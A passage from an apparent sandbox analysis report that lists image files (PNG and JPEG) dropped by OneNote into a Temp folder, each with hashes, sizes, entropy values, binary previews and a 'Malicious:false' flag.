                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Temp\{108C1F52-CE75-4076-AED1-0AE73518E75F}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Temp\{11770F69-A393-4AB9-AB27-27F20E795C66}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Temp\{127EAD47-C1BB-4693-B85F-563336B48C1E}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):41893
                                                                                                  Entropy (8bit):7.52654558351485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                  MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                  SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                  SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                  SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                  C:\Users\user\AppData\Local\Temp\{13FCAC43-0049-4600-A47F-69D835EE9831}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Temp\{1454529D-74C4-433F-85C9-1ADFEA71E2A9}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Temp\{146BBD48-94A3-4838-8B48-BD36D465F907}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Temp\{146DD046-1353-4FF9-A26D-1D1C099A0044}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Temp\{146FDA7C-22C8-4DBD-A062-025F19411934}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Temp\{16E24D18-921E-4699-9544-E6DBD37BEA8D}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):41893
                                                                                                  Entropy (8bit):7.52654558351485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                  MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                  SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                  SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                  SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                  C:\Users\user\AppData\Local\Temp\{181D68E2-78B9-4182-BC16-0DE50F7C34B3}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60924
                                                                                                  Entropy (8bit):7.758472758205366
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                  MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                  SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                  SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                  SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\{184F2DFA-79DF-404A-892A-C7B5CB0BAF5B}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64118
                                                                                                  Entropy (8bit):7.742974333356952
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                  MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                  SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                  SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                  SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

                                                                                                  C:\Users\user\AppData\Local\Temp\{1882A59D-8D1D-4CB7-8D2C-C307E65D21B0}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{189E85CB-C1D1-4F23-BC88-597AEA5F69BE}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):12180
                                                                                                  Entropy (8bit):5.318266117301791
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                  MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                  SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                  SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                  SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                  Malicious:false
